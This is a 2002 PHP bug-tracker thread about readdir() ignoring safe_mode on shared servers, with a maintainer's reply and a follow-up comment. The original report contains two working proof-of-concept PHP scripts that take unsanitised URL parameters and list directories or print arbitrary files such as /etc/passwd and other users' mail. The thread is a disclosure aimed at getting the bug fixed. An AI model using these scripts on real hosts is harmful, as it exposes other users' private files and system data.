ID: 15185 Updated by: daniel Reported By: [EMAIL PROTECTED] Old Status: Bogus Status: Open Bug Type: *Directory/Filesystem functions Operating System: Slackware PHP Version: 4.0.6 New Comment:
Actually this is a dupe of MY bug report. PHP has a bug with readdir(). safe_mode does not limit readdir: http://bugs.php.net/bug.php?id=15018&edit=1 someone bogusified it. Wasn't me. And yes, I tested it on 4.1.0. Kind Regards, Daniel Lorch Previous Comments: ------------------------------------------------------------------------ [2002-01-23 14:54:45] [EMAIL PROTECTED] not a php issue php runs with the same permissions as the user the webserver runs under, so if this user has permission to see the whole server filesystem php will have that, too run your wesserver as a low-privileged user and give it read permission to the absolute minimum of the filesystem or have a look at http://www.php.net/manual/en/features.safe-mode.php ------------------------------------------------------------------------ [2002-01-23 14:26:36] [EMAIL PROTECTED] I've found a possible bug in php 4.06. using simple function readdir(); I coul explore about 90 % of server including /var/spool/mail /ect/passwd e.t.c. I've wrote simple script that let me to move through all directories: <? if ($dir=="") { $dir="."; } function getDirList ($dirName) { print("<h1>Index of: $dirName</h1><hr>"); $dirs=array(); $files=array(); $dirfiles=array(); $dirn=0; $filen=0; $d = dir($dirName); while($entry = $d->read()) { if ($entry != "." && $entry != "..") { if (is_dir($dirName."/".$entry)) { array_push($dirs, "$dirName/$entry"); $dirn++; } else { array_push($files, "$entry"); array_push($dirfiles, "$dirName"); $filen++; } } } $d->close(); $tmp=0; while ($tmp<$dirn) { print("<a href='?dir=$dirs[$tmp]'>$dirs[$tmp]</a><br>"); $tmp++; } $tmp=0; while ($tmp<$filen) { print("<a href='?dir=$dirfiles[$tmp]'>$dirfiles[$tmp]</a>/<a href='$dirfiles[$tmp]/$files[$tmp]'>$files[$tmp]</a><br>"); $tmp++; } if ($dirName!=".") { print("<hr><button OnClick='javascript:history.back();'>Back"); } } getDirList("$dir"); ?> Default directory is '.' (Your home directory), but if you load this page with parameter dir=/ ( ex. http://your.host/dir.php?dir=/ ) You will probably access main folder on your unix server. I wrote second script that let me read the files not in my home directory: <? function readtxt ($path) { $Plik=fopen($path, "r"); flock($Plik, 1); $rozm=filesize("$path"); $flaga=0; while($flaga<$rozm) { $Linia = fgets($Plik, 2); print("$Linia"); if ($Linia=="\n") { print("<br>"); } $flaga++; } flock($Plik, 3); fclose($Plik); } readtxt ($file); ?> By typing, for example http://your.host/readtxt.php?file=/var/spool/mail/disco_dzik i could read disco_dzik's mail. Simple, but serious... Both of scripts wold not move You outside your home directory if the server would be two machines (first one for system, and the second one just fore home directories) - it's obvious, but I've checked it ;) P.S. Scripts were wroten for my use only, so some of the variables are named in polish - sorry for that ;) This is a serious bug that needs to be fixed ! ------------------------------------------------------------------------ Edit this bug report at http://bugs.php.net/?id=15185&edit=1 -- PHP Development Mailing List <http://www.php.net/> To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED] To contact the list administrators, e-mail: [EMAIL PROTECTED]
